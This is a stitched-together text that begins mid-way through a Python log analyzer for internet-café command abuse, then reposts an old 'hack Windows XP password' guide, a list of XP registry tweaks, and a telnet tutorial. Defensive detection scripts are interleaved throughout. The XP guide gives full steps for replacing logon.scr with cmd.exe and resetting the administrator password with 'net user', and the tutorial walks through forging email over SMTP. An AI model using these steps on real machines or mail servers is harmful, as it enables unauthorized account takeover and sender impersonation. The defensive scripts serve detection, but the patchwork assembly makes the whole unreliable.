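2009-10-17T14:05:02 CAFE-PC07 guest net view
2009-10-17T14:06:30 CAFE-PC07 guest shutdown -s -m HJCPwnts -t 20 -c bye
2009-10-17T14:09:00 CAFE-PC07 guest net user ARUJ /add
2009-10-17T14:31:45 CAFE-PC07 guest net user ARUJ /delete
2009-10-17T15:00:00 CAFE-PC03 staff net user
"""

# Image names a customer session should never terminate.
# "timer.exe" is the post's placeholder name for the billing software.
PROTECTED_IMAGES = {"timer.exe"}


def normalise(token):
    """Lower-case a token and turn a leading '-' switch into '/' form."""
    token = token.lower()
    return "/" + token[1:] if token.startswith("-") and len(token) > 1 else token


def option_value(argv, switch):
    """Return the argument that follows `switch` (given in '/x' form), or None."""
    for i, token in enumerate(argv[:-1]):
        if normalise(token) == switch:
            return argv[i + 1]
    return None


def classify(argv):
    """Map one command line to (rule, detail), or None if it is uninteresting."""
    if not argv:
        return None
    exe = argv[0].lower()
    exe = exe[:-4] if exe.endswith(".exe") else exe
    switches = {normalise(a) for a in argv[1:]}
    if exe == "taskkill" and "/f" in switches:
        image = option_value(argv, "/im")
        if image and image.lower() in PROTECTED_IMAGES:
            return ("protected-process-killed", image)
    if exe == "shutdown":
        target = option_value(argv, "/m")
        if target:
            return ("remote-shutdown", target.lstrip("\\"))
    if exe == "net" and len(argv) >= 4 and argv[1].lower() == "user":
        if "/add" in switches:
            return ("account-created", argv[2])
        if "/delete" in switches:
            return ("account-deleted", argv[2])
    return None


def analyze(log_text, window=timedelta(hours=1)):
    """Return findings as (time, host, user, rule, detail) tuples, in log order."""
    findings, created = [], {}
    for line in log_text.splitlines():
        parts = line.split(" ", 3)
        if len(parts) < 4:
            continue                      # blank or malformed record
        stamp, host, user, command = parts
        when = datetime.fromisoformat(stamp)
        hit = classify(command.split())
        if hit is None:
            continue
        rule, detail = hit
        findings.append((stamp, host, user, rule, detail))
        key = (host, detail.lower())
        if rule == "account-created":
            created[key] = when
        elif rule == "account-deleted" and key in created:
            # An account that exists only briefly matches the create, use,
            # delete sequence described above.
            if when - created.pop(key) <= window:
                findings.append((stamp, host, user, "short-lived-account", detail))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(*finding)
```

Running these commands from a customer session also presupposes rights a locked-down kiosk account should not have, so any hit is worth a look at the account's group membership as well.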
HOW TO HACK WINDOWS XP PASSWORD BY NEW METHOD

If you log into a limited account on your target machine, open up a DOS prompt and enter this set of commands exactly:

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backs up logon.scr
copy cmd.exe temphack\cmd.exe *backs up cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos


What you have just done is back up the command program and the screen saver file, then put cmd.exe in the screen saver's place, so that when the machine starts the logon screen saver you get an unprotected DOS prompt without logging into XP.

Once this happens, enter this command:

net user password

If the Administrator Account is called ARUJ and you want the password PARAJULI enter this

net user ARUJ PARAJULI
and this changes the password on Frank's machine to blah and you're in.


Have Fun!
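The procedure above leaves two artifacts an administrator can look for: a logon.scr whose content is really the command interpreter, and a stray copy of cmd.exe in a new folder. The following is an added example, not part of the original post: it compares files under a directory against a known-good cmd.exe by size and SHA-256. The baseline copy, the directory layout and the file contents are constructed stand-ins, and the function names are hypothetical.

```python
import hashlib
import os
import tempfile


def sha256_of(path):
    """Hash a file in chunks so large binaries need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def find_copies_of(reference, root, expected=("cmd.exe",)):
    """Return sorted relative paths under `root` whose content equals `reference`.

    Paths listed in `expected` (compared case-insensitively) are the places
    where that content legitimately lives and are not reported.
    """
    allowed = {os.path.normcase(p).lower() for p in expected}
    ref_size = os.path.getsize(reference)
    ref_hash = sha256_of(reference)
    matches = []
    for folder, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(folder, name)
            rel = os.path.relpath(path, root)
            if os.path.normcase(rel).lower() in allowed:
                continue
            try:
                # Compare sizes first so only plausible candidates are hashed.
                if os.path.getsize(path) != ref_size:
                    continue
                if sha256_of(path) == ref_hash:
                    matches.append(rel)
            except OSError:
                continue  # unreadable or vanished file: nothing to compare
    return sorted(matches)


def build_demo_tree(root):
    """Create a constructed stand-in for system32 after the steps above were run."""
    shell = b"MZ constructed stand-in for cmd.exe"
    saver = b"MZ constructed stand-in for the real logon.scr"
    system_dir = os.path.join(root, "system32")
    os.makedirs(os.path.join(system_dir, "temphack"))
    os.makedirs(os.path.join(root, "baseline"))
    layout = {
        os.path.join("baseline", "cmd.exe"): shell,              # known-good copy (assumed)
        os.path.join("system32", "logon.scr"): shell,            # interpreter renamed over the saver
        os.path.join("system32", "notepad.exe"): b"MZ unrelated constructed file",
        os.path.join("system32", "temphack", "cmd.exe"): shell,  # backup made by the procedure
        os.path.join("system32", "temphack", "logon.scr"): saver,
    }
    for rel, data in layout.items():
        with open(os.path.join(root, rel), "wb") as handle:
            handle.write(data)
    return os.path.join(root, "baseline", "cmd.exe"), system_dir


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as demo:
        reference, system_dir = build_demo_tree(demo)
        for hit in find_copies_of(reference, system_dir):
            print("same content as cmd.exe:", hit)
```

On a live system the reference would be a cmd.exe taken from trusted media and the root the real system32 directory.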

XP HACK!!!100% WORKING


Well, some of these tricks are quite common now, but I would still like to go ahead, keeping in mind the NOVICE users.

New tricks UPDATED. 20/jan/07


Shortcut to restarting XP
You can restart a Windows XP Pro or Home machine easily by creating a shortcut with the following path (assuming you installed Windows XP on your C: partition): "c:\windows\system32\shutdown.exe -r -f -t 00". -r is for restarting the computer. -f is to force close all programs without saving. -t 00 is used to restart in zero seconds, i.e. as soon as you double-click on the shortcut. You can log off from Windows XP Professional or Home edition by running "C:\windows\system32\shutdown.exe -l -f -t 00". You can also shut down Windows XP Home or Professional edition by running "c:\windows\system32\shutdown.exe -s -f -t 00". You always have to turn the power off at the CPU yourself after running this command. (Same with AT and ATX powered machines.) If you want to power down an ATX machine automatically, run "c:\windows\system32\tsshutdn.exe 00 /POWERDOWN /DELAY:00". This is used to turn off a server. Even though your computer will be shut down completely, this whole operation will take 30 seconds to finish. This works even if you don't have networked computers attached to your computer.
1) Disabling Display of Drives in My Computer :
This is yet another trick you can play on your geek friend. To disable the display of local or networked drives when you click My Computer, go to:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Now in the right pane create a new DWORD item and name it NoDrives. Now modify its value and set it to 3FFFFFF (Hexadecimal). Now press F5 to refresh. When you click on My Computer, no drives will be shown. To enable display of drives in My Computer, simply delete this DWORD item. Its .reg file is as follows:
REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDrives"=dword:03ffffff



2) Pop a banner each time Windows Boots :
To pop a banner which can contain any message you want to display just before a user is going to log on, go to the key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WinLogon
Now create a new string value in the right pane named LegalNoticeCaption and enter the value that you want to see in the Menu Bar. Now create yet another new string value and name it LegalNoticeText. Modify it and insert the message you want to display each time Windows boots. This can be effectively used to display the company's private policy each time the user logs on to his NT box. Its .reg file would be:
REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon]
"LegalNoticeCaption"="Caption here."
3) Great trick: lock your PC yourself
To lock your PC, open Notepad, copy and paste the script below and save it with a .VBS extension. This will create a shortcut; run (click) it.
' Creates a desktop shortcut that locks the workstation when clicked
set WshShell = WScript.CreateObject("WScript.Shell")
set oShellLink = WshShell.CreateShortcut(WshShell.SpecialFolders("Desktop") & "\LockWorkstation.lnk")
oShellLink.TargetPath = "%windir%\system32\rundll32.exe"
oShellLink.Arguments = "user32.dll,LockWorkStation"
oShellLink.Save
First select a folder; for example I'll use a folder named movies in D drive: D:\movies\
In the same drive, create a text file and type
ren movies movies.{21EC2020-3AEA-1069-A2DD-08002B30309D}
and save it as loc.bat
Again, type in Notepad
ren movies.{21EC2020-3AEA-1069-A2DD-08002B30309D} movies
and save it as key.bat
Now in D drive you can see two batch files, loc and key. When you double-click loc the movies folder will change to Control Panel, and when you double-click key the Control Panel will change back to a normal folder. This only changes how Explorer displays the folder; the files inside are not encrypted or access-controlled and remain reachable from a command prompt.
There are two more different tricks on this site to lock your PC down in unique ways.. don't know where I have typed them.. !!!
4) Deleting System Options from the Start menu :
You can actually remove the Find and Run options from the Start menu by performing a simple registry hack. Again, like always, launch the registry editor and scroll down to the key below: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer Right-click on the right pane and select New, DWORD Value. Name it NoFind. (To remove the RUN option name it NoRun.) Double-click the newly created DWORD to edit its value and enter 1 as its value. This will disable the FIND option of the Start Menu and will also disable the default shortcut key (F3 for Find). To restore the Run or Find command, modify the value of the DWORD to 0 or simply delete the DWORD value.
5) Cleaning Recent Docs Menu and the RUN MRU :
The Recent Docs menu can be easily disabled by editing the Registry. To do this go to the following key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer Now in the right pane, create a new DWORD value by the name NoRecentDocsMenu and set its value to 1. Restart Explorer to save the changes. You can also clear the RUN MRU history. All the listings are stored in the key: HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU You can delete individual listings or the entire listing. To delete History of Find listings go to: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Doc Find Spec MRU and delete
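Tricks 1, 4 and 5 all write values under the same Policies\Explorer key, so a support technician facing a machine with missing drives or a missing Run box can read them back from a registry export. The following is an added example, not part of the original post: it parses a constructed REGEDIT4 export, decodes the NoDrives bitmask into drive letters (bit 0 is A:, bit 25 is Z:) and lists which of NoFind, NoRun and NoRecentDocsMenu are set to 1. The sample export and the function names are assumptions.

```python
import re

# Constructed export in the REGEDIT4 format shown above; the values are sample data.
SAMPLE_REG = r"""REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDrives"=dword:03ffffff
"NoFind"=dword:00000001
"NoRun"=dword:00000000
"NoRecentDocsMenu"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon]
"LegalNoticeCaption"="Caption here."
"""

POLICY_KEY = r"software\microsoft\windows\currentversion\policies\explorer"
SWITCHES = ("NoFind", "NoRun", "NoRecentDocsMenu")   # 1 = restriction active

_SECTION = re.compile(r"^\[(.+)\]$")
_VALUE = re.compile(r'^"([^"]+)"=(.*)$')


def parse_reg(text):
    """Parse a .reg export into {key path: {value name: int or str}}."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue                      # blank line or comment
        section = _SECTION.match(line)
        if section:
            current = keys.setdefault(section.group(1), {})
            continue
        value = _VALUE.match(line)
        if value is None or current is None:
            continue                      # header line or unsupported syntax
        name, data = value.groups()
        if data.lower().startswith("dword:"):
            current[name] = int(data[6:], 16)
        elif len(data) >= 2 and data.startswith('"') and data.endswith('"'):
            current[name] = data[1:-1]
        # other value types (hex:, ...) are ignored in this example
    return keys


def hidden_drives(mask):
    """Decode a NoDrives bitmask: bit 0 hides A:, bit 1 hides B:, ... bit 25 hides Z:."""
    return [chr(ord("A") + bit) for bit in range(26) if (mask >> bit) & 1]


def explorer_restrictions(text):
    """Report active Explorer policy restrictions, grouped by registry hive."""
    report = {}
    for path, values in parse_reg(text).items():
        hive, _, rest = path.partition("\\")
        if rest.lower() != POLICY_KEY:
            continue
        lowered = {name.lower(): data for name, data in values.items()}
        active = {}
        mask = lowered.get("nodrives", 0)
        if isinstance(mask, int) and mask:
            active["NoDrives"] = hidden_drives(mask)
        for switch in SWITCHES:
            if lowered.get(switch.lower()) == 1:
                active[switch] = True
        if active:
            report[hive] = active
    return report


if __name__ == "__main__":
    for hive, active in explorer_restrictions(SAMPLE_REG).items():
        for name, detail in active.items():
            print(hive, name, detail)
```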
6) Can u Delete Recycle Bin?
One thing is for sure: a delete option can be added to the Recycle Bin. The old registry thing will work out:
* launch the registry editor
* open HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder
* to add a rename and delete option, change the Dword attribute to 70 01 00 20
* refresh and reboot the system and you are done.
PS: always back up your data as well as the registry before attempting to work on it if you are a newbie.

7) To change the icons used for specific drives in explorer
Open regedit by typing regedit into Start -> Run
then navigate to
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Now create a key (KEY, not VALUE!) called DriveIcons under Explorer. Within DriveIcons, create another key with the drive letter you want to change (e.g. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\K). Create another key within the drive letter key called DefaultIcon. Now set the default String value equal to the icon you want to use. If you have a file that has more than one icon in it, such as a DLL file, use the standard C:\full_path\icon_file.dll,n where n is the number of the icon within the file icon_file.dll.
~ c h e e r s! ~

Change drive icons
First of all copy an icon file to the root of the drive. Example: c:\icon.ico
Then create a file called autorun.inf in the root of the same drive (c:\autorun.inf), open that file and type the following:
[autorun]
icon=icon.ico
Save and close the file.
Now open My Computer and refresh.. and whoa! Icon changed. You can apply this to other drives too.
Be careful:
"autorun.inf" and "icon.ico" must both be in the root of the drive. Example: c:\autorun.inf and c:\icon.ico.
ENJOY, this works on 98 too!!!!!!!!!!!!!!!!!!

8) Hacking windows SEND TO MENU
I know this is a very simple thing but the problem, as like many other issues, is the ignorance about it.
How often do you copy songs from a CD? Or some photos from a CD?
What do you do? You select the required files and press CTRL-C. Open the destination folder and press CTRL-V. Here is something that can save you time: customize your SEND TO menu.
This sounds simple and you can do it in less than sixty seconds. You can create your own BASKET.
1. First you’ll need access to hidden files. So change your view settings to make all hidden files visible: Tools -> Folder Options -> View (tab) and select "Show hidden files and folders". Go to parent drive:/documents and settings/(user name)/send to
2. Open up My Computer and locate your most used folders.
3. Create a shortcut of the most used folders in the SEND TO folder. You can do this in a number of ways:
* Right click -> Send to Desktop (create shortcut) and move the shortcut from the desktop to the SEND TO folder.
* Copy the most used folder, go to the SEND TO folder and right click -> Paste Shortcut.
4. Also remember to rename the shortcuts to "send to videos" or "send to photos". We don’t need confusion when we use them later.
5. DONE
~ c h e e r s! ~
9) How to remove the shortcut arrow from the desktop ?
Open Regedit and navigate to the following key:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ Shell Icons
Back up the key. In the right pane, create a new String value named "29". Double-click 29 and set its data to:
C:\Windows\System32\shell32.dll,50 (an empty icon)
Close Registry Editor.
Now,
Right-click the Desktop, choose Properties and click the Appearance tab.
Click the Advanced button.
Choose Icon from the drop-down list.
Set its size to 31 and press OK, OK.
The changes will be applied now. Repeat the above steps and then set the Icon size back to 32 (default). The above steps are required to force Windows to redraw the icons.
10) The Complete list ! Can u Do it!
Try to create a folder in Windows with any of these names: "con" or "nul" or "Aux" or "Lpt1". Windows will not let you create it.
This is because these names refer to some well-known ports: con corresponds to the console, Lpt1 corresponds to the printer, and so on.
Well, that was common, but how about these? Try these too:
CON, PRN, AUX, CLOCK$, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, and LPT9.
TURN NUMLOCK ON AT LOGON.!!
NumLock does not toggle on by default (system-wide), even if you have it set in your PC's BIOS, because of XP's multi-user functionality. Guess Microsoft doesn't know everyone actually turns it on, which should be reason enough for what acts as "default"... Anyway, you can hack the Windows Registry to change this behavior, or run a script at logon to turn NumLock on.
1. To enable NumLock through the Registry:
* Open Windows' Registry Editor (START > RUN, type "REGEDIT").
* Navigate to HKEY_USERS\.Default\Control Panel\Keyboard.
* Change the value for InitialKeyboardIndicators from 0 to 2.
2. To enable NumLock using a script, see this MS Knowledgebase article for complete instructions:
http://support.microsoft.com/directory/article.asp?ID=KB;EN-US;Q262625
Option 1 is the quicker method, but if you have more than one user on your system and one or more don't want NumLock on (stranger things have been known of), then option 2 is the way to go since it allows you to only attach the script to specific users.
REMOVING SERVICES DEPENDENCIES.!!
This will allow you to disable a service or uninstall it from your system without affecting another service that depends on it. Here's how you do it:
1. After you have set your services the way you want them and you have disabled/uninstalled something that another service depends on, run "regedit".
2. Under HKEY_LOCAL_MACHINE\System\ find the service that will not function due to another service being disabled/uninstalled (found in ControlSet001\Services, ControlSet002\Services, and CurrentControlSet\Services).
3. Once you have found the service, right-click on the string value "DependOnService" and modify it.
4. You should now see a list of services that it is dependent on. Simply delete the service that you have disabled/uninstalled.
5. Restart your computer and you're ready to go.
Disclaimer: REMEMBER TO BACK UP YOUR REGISTRY FIRST. I'm not totally sure if this will have any negative effects on your system. I used this method after uninstalling "Netbios over Tcpip" from my system completely, so that my Dhcp service would function, and I have had NO negative effects on my system.

TURN ON UR PC IN JUST 10 SECONDS
Alright, so you want to know how to turn the PC on in 10 seconds (may vary)? Here's what you have to do.
Click on the Start button, then press R to go to Run. In Run, type Regedit and press Enter. This will open Registry Editor. Now look for the key
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ContentIndex
There, find the value called "Startup Delay" and double-click on it. Under Base, click Decimal. Its default value is 4800000 (75300: hexadecimal). Change the value to 40000. There you go, you have done it. Now close the Registry Editor and restart your computer.

HACKING WINDOWS XP NEW VERSION

Hacking With Windows XP
So you have the newest, glitziest, "Fisher Price" version of Windows: XP. How can you use XP in a way that sets you apart from the boring millions of ordinary users?
The key to doing amazing things with XP is as simple as D O S. Yes, that's right, DOS as in MS-DOS, as in Microsoft Disk Operating System. Windows XP (as well as NT and 2000) comes with two versions of DOS. Command.com is an old DOS version. Various versions of command.com come with Windows 95, 98, SE, ME, Windows 3, and DOS-only operating systems.
The other DOS, which comes only with XP, 2000 and NT, is cmd.exe. Usually cmd.exe is better than command.com because it is easier to use, has more commands, and in some ways resembles the bash shell in Linux and other Unix-type operating systems. For example, you can repeat a command by using the up arrow until you back up to the desired command. Unlike bash, however, your DOS command history is erased whenever you shut down cmd.exe. The reason XP has both versions of DOS is that sometimes a program that won't run right in cmd.exe will work in command.com.
Note: I'm not comparing bash to DOS.
DOS is your number one Windows gateway to the Internet, and the open sesame to local area networks. From DOS, without needing to download a single hacker program, you can do amazingly sophisticated explorations and even break into poorly defended computers.
****************
You can go to jail warning: Breaking into computers is against the law if you do not have permission to do so from the owner of that computer. For example, if your friend gives you permission to break into her Hotmail account, that won't protect you because Microsoft owns Hotmail and they will never give you permission.
****************
****************
You can get expelled warning: Some kids have been kicked out of school just for bringing up a DOS prompt on a computer. Be sure to get a teacher's WRITTEN permission before demonstrating that you can hack on a school computer.
****************
So how do you turn on DOS? Click All Programs -> Accessories -> Command Prompt
That runs cmd.exe. You should see a black screen with white text on it, saying something like this:
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\>
Your first step is to find out what commands you can run in DOS. If you type "help" at the DOS prompt, it gives you a long list of commands. However, this list leaves out all the commands hackers love to use. Here are some of those left out hacker commands.
TCP/IP commands:
telnet
netstat
nslookup
tracert
ping
ftp
NetBIOS commands (just some examples):
nbtstat
net use
net view
net localgroup
TCP/IP stands for transmission control protocol/Internet protocol. As you can guess by the name, TCP/IP is the protocol under which the Internet runs, along with user datagram protocol (UDP). So when you are connected to the Internet, you can try these commands against other Internet computers. Most local area networks also use TCP/IP.
NetBIOS (Net Basic Input/Output System) protocol is another way to communicate between computers. This is often used by Windows computers, and by Unix/Linux type computers running Samba. You can often use NetBIOS commands over the Internet (being carried inside of, so to speak, TCP/IP). In many cases, however, NetBIOS commands will be blocked by firewalls. Also, not many Internet computers run NetBIOS because it is so easy to break in using them. I will cover NetBIOS commands in the next article to XP Hacking.
The queen of hacker commands is telnet. To get Windows help for telnet, in the cmd.exe window give the command:
C:\>telnet /?
Here's what you will get:
telnet [-a][-e escape char][-f log file][-l user][-t term][host[port]]
-a Attempt automatic logon. Same as -l option except uses the currently logged on user's name.
-e Escape character to enter telnet client prompt.
-f File name for client side logging
-l Specifies the user name to log in with on the remote system. Requires that the remote system support the TELNET ENVIRON option.
-t Specifies terminal type. Supported term types are vt100, vt52, ansi and vtnt only.
host Specifies the hostname or IP address of the remote computer to connect to.
port Specifies a port number or service name.
****************
Newbie note: what is a port on a computer? A computer port is sort of like a seaport. It's where things can go in and/or out of a computer. Some ports are easy to understand, like keyboard, monitor, printer and modem. Other ports are virtual, meaning that they are created by software. When that modem port of yours (or LAN or ISDN or DSL) is connected to the Internet, your computer has the ability to open or close any of over 65,000 different virtual ports, and has the ability to connect to any of these on another computer - if it is running that port, and if a firewall doesn't block it.
****************
****************
Newbie note: How do you address a computer over the Internet? There are two ways: by number or by name.
****************
The simplest use of telnet is to log into a remote computer. Give the command:
C:\>telnet targetcomputer.com (substituting the name of the computer you want to telnet into for targetcomputer.com)
If this computer is set up to let people log into accounts, you may get the message:
login:
Type your user name here, making sure to be exact. You can't swap between lower case and capital letters. For example, user name Guest is not the same as guest.
****************
Newbie note: Lots of people email me asking how to learn what their user name and password are. Stop laughing, darn it, they really do. If you don't know your user name and password, that means whoever runs that computer didn't give you an account and doesn't want you to log on.
****************
Then comes the message:
Password:
Again, be exact in typing in your password.
What if this doesn't work?
Every day people write to me complaining they can't telnet. That is usually because they try to telnet into a computer, or a port on a computer, that is set up to refuse telnet connections. Here's what it might look like when a computer refuses a telnet connection:
C:\ >telnet 10.0.0.3
Connecting To 10.0.0.3...Could not open connection to the host, on port 23. A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.
Or you might see:
C:\ >telnet hotmail.com
Connecting To hotmail.com...Could not open connection to the host, on port 23. No connection could be made because the target machine actively refused it.
If you just give the telnet command without giving a port number, it will automatically try to connect on port 23, which sometimes runs a telnet server.
**************
Newbie note: your Windows computer has a telnet client program, meaning it will let you telnet out of it. However you have to install a telnet server before anyone can telnet into port 23 on your computer.
*************
If telnet failed to connect, possibly the computer you were trying to telnet into was down or just plain no longer in existence. Maybe the people who run that computer don't want you to telnet into it.
Even though you can't telnet into an account inside some computer, often you can get some information back or get that computer to do something interesting for you. Yes, you can get a telnet connection to succeed, without doing anything illegal, against almost any computer, even if you don't have permission to log in. There are many legal things you can do to many randomly chosen computers with telnet. For example:
C:\>telnet freeshell.org 22
SSH-1.99-OpenSSH_3.4p1
That tells us the target computer is running an SSH server, which enables encrypted connections between computers. If you want to SSH into an account there, you can get a shell account for free at http://freeshell.org/ . You can get a free SSH client program from http://winfiles.com/ .
***************
You can get punched in the nose warning: Your online provider might kick you off for making telnet probes of other computers. The solution is to get a local online provider and make friends with the people who run it, and convince them you are just doing harmless, legal explorations.
*************
Sometimes a port is running an interesting program, but a firewall won't let you in. For example, 10.0.0.3, a computer on my local area network, runs an email sending program, (sendmail working together with Postfix, and using Kmail to compose emails). I can use it from an account inside 10.0.0.3 to send emails with headers that hide from where I send things.
If I try to telnet to this email program from outside this computer, here's what happens:
C:\>telnet 10.0.0.3 25
Connecting To 10.0.0.3...Could not open connection to the host, on port 25. No connection could be made because the target machine actively refused it.
However, if I log into an account on 10.0.0.3 and then telnet from inside to port 25, here's what I get:
Last login: Fri Oct 18 13:56:58 2002 from 10.0.0.1
Have a lot of fun...
cmeinel@test-box:~> telnet localhost 25
Trying ::1...
telnet: connect to address ::1: Connection refused
Trying 127.0.0.1... [Carolyn's note: 127.0.0.1 is the numerical address meaning localhost, the same computer you are logged into]
Connected to localhost.
Escape character is '^]'.
220 test-box.local ESMTP Postfix
The reason I keep this port 25 hidden behind a firewall is to keep people from using it to try to break in or to forge email. Now the ubergeniuses reading this will start to make fun of me because no Internet address that begins with 10. is reachable from the Internet. However, sometimes I place this "test-box" computer online with a static Internet address, meaning whenever it is on the Internet, it always has the same numerical address. I'm not going to tell you what its Internet address is because I don't want anyone messing with it. I just want to mess with other people's computers with it, muhahaha. That's also why I always keep my Internet address from showing up in the headers of my emails.
***************
Newbie note: What is all this about headers? It's stuff at the beginning of an email that may - or may not - tell you a lot about where it came from and when. To see full headers, in Outlook click view -> full headers. In Eudora, click the "Blah blah blah" icon.
****************
Want a computer you can telnet into and mess around with, and not get into trouble no matter what you do to it? I've set up my techbroker.com (206.61.52.33) with user xyz, password guest for you to play with. Here's how to forge email to xyz@techbroker.com using telnet. Start with the command:
C:\>telnet techbroker.com 25
Connecting To Techbroker.com
220 Service ready
Now you type in who you want the message to appear to come from:
helo santa@techbroker.com
Techbroker.com will answer:
250 host ready
Next type in your mail from address:
mail from:santa@techbroker.com
250 Requested mail action okay, completed
Your next command:
rcpt to:xyz@techbroker.com
250 Requested mail action okay, completed
Your next command:
data
354 Start main input; end with <CRLF>.<CRLF>
<CRLF> just means hit return. In case you can't see that little period between the <CRLF>s, what you do to end composing your email is to hit enter, type a period, then hit enter again. Anyhow, try typing:
This is a test.
.
250 Requested mail action okay, completed
quit
221 Service closing transmission channel
Connection to host lost.
Using techbroker's mail server, even if you enable full headers, the message we just composed looks like:
Status: R
X-status: N
This is a test.
That's a pretty pathetic forged email, huh? No "from", no date. However, you can make your headers better by using a trick with the data command. After you give it, you can insert as many headers as you choose. The trick is easier to show than explain:
220 Service ready
helo santa@northpole.org
250 host ready
mail from:santa@northpole.com
250 Requested mail action okay, completed
rcpt to:cmeinel@techbroker.com
250 Requested mail action okay, completed
data
354 Start main input; end with <CRLF>.<CRLF>
from:santa@deer.northpole.org
Date: Mon, 21 Oct 2002 10:09:16 -0500
Subject: Rudolf
This is a Santa test.
.
250 Requested mail action okay, completed
quit
221 Service closing transmission channel
Connection to host lost.
The message then looks like:
from:santa@deer.northpole.org
Date: Mon, 21 Oct 2002 10:09:16 -0500
Subject: Rudolf
This is a Santa test.
The trick is to start each line you want in the headers with one word followed by a colon, then the rest of the line, followed by "return". As soon as you write a line that doesn't begin this way, the rest of what you type goes into the body of the email.
Notice that the santa@northpole.com from the "mail from:" command didn't show up in the header. Some mail servers would show both "from" addresses.
You can forge email on techbroker.com within one strict limitation. Your email has to go to someone at techbroker.com. If you can find any way to send email to someone outside techbroker, let us know, because you will have broken our security, muhahaha! Don't worry, you have my permission.
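The gap between the "mail from:" address and the typed "from:" header is exactly what a recipient can check on a server that does record the envelope sender. The following is an added example, not part of the original article: it parses constructed copies of the two messages above plus an ordinary one, and reports missing From, Date and Message-ID headers and an envelope sender whose domain does not match the visible From. The Return-Path lines are an assumption (the article's server did not record them), and the domain comparison is a simplification that does not consult the public suffix list.

```python
from email import message_from_string
from email.utils import parseaddr

# Constructed messages. The headers follow the two telnet sessions above; the
# Return-Path line (the envelope "mail from:" as recorded at delivery) is an
# assumption added for the example.
SESSION_ONE = (
    "Return-Path: <santa@techbroker.com>\n"
    "Status: R\n"
    "X-status: N\n"
    "\n"
    "This is a test.\n"
)
SESSION_TWO = (
    "Return-Path: <santa@northpole.com>\n"
    "from:santa@deer.northpole.org\n"
    "Date: Mon, 21 Oct 2002 10:09:16 -0500\n"
    "Subject: Rudolf\n"
    "\n"
    "This is a Santa test.\n"
)
ORDINARY = (  # constructed message from a normal mail client, for contrast
    "Return-Path: <bounce@mail.example.org>\n"
    "From: Alice <alice@example.org>\n"
    "Date: Mon, 21 Oct 2002 10:12:00 -0500\n"
    "Message-ID: <20021021101200.1234@mail.example.org>\n"
    "Subject: Minutes\n"
    "\n"
    "Attached.\n"
)


def domain_of(header_value):
    """Extract the lower-cased domain from an address header, or '' if none."""
    address = parseaddr(header_value or "")[1]
    return address.rpartition("@")[2].lower() if "@" in address else ""


def aligned(a, b):
    """Relaxed match: the domains are equal or one is a subdomain of the other."""
    return bool(a and b) and (a == b or a.endswith("." + b) or b.endswith("." + a))


def header_findings(raw):
    """Return the list of forgery signals present in one raw message."""
    msg = message_from_string(raw)
    findings = []
    # A message typed by hand over telnet carries only the headers its author
    # remembered to type; mail clients add all three of these themselves.
    for name in ("From", "Date", "Message-ID"):
        if msg[name] is None:
            findings.append("missing-" + name.lower())
    envelope = domain_of(msg["Return-Path"])
    visible = domain_of(msg["From"])
    if envelope and visible and not aligned(envelope, visible):
        findings.append("envelope-mismatch:%s!=%s" % (envelope, visible))
    return findings


if __name__ == "__main__":
    for label, raw in (("session one", SESSION_ONE),
                       ("session two", SESSION_TWO),
                       ("ordinary", ORDINARY)):
        print(label, header_findings(raw))
```

These are signals rather than proof: mailing lists and forwarding services also produce envelope and header domains that differ.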
Next, you can read the email you forge on techbroker.com via telnet:
C:\>telnet techbroker.com 110
+OK <30961.5910984301@techbroker.com> service ready
Give this command:
user xyz
+OK user is known
Then type in this:
pass test
+OK mail drop has 2 message(s)
retr 1
+OK message follows
This is a test.
If you want to know all possible commands, give this command:
help
+OK help list follows
USER user
PASS password
STAT
LIST [message]
RETR message
DELE message
NOOP
RSET
QUIT
APOP user md5
TOP message lines
UIDL [message]
HELP
Unless you use a weird online provider like AOL, you can use these same tricks to send and receive your own email. Or you can forge email to a friend by telnetting to his or her online provider's email sending computer(s).
With most online providers you need to get the exact name of their email computer(s). Often it is simply mail.targetcomputer.com (substitute the name of the online provider for targetcomputer). If this doesn't work, you can find out the name of their email server with the DOS nslookup program, which only runs from cmd.exe. Here's an example:
C:\ >nslookup
Default Server: DNS1.wurld.net
Address: 206.61.52.11
> set q=mx
> dimensional.com
Server: DNS1.wurld.net
Address: 206.61.52.11
dimensional.com MX preference = 5, mail exchanger =mail.dimensional.com
dimensional.com MX preference = 10, mail exchanger =mx2.dimensional.com
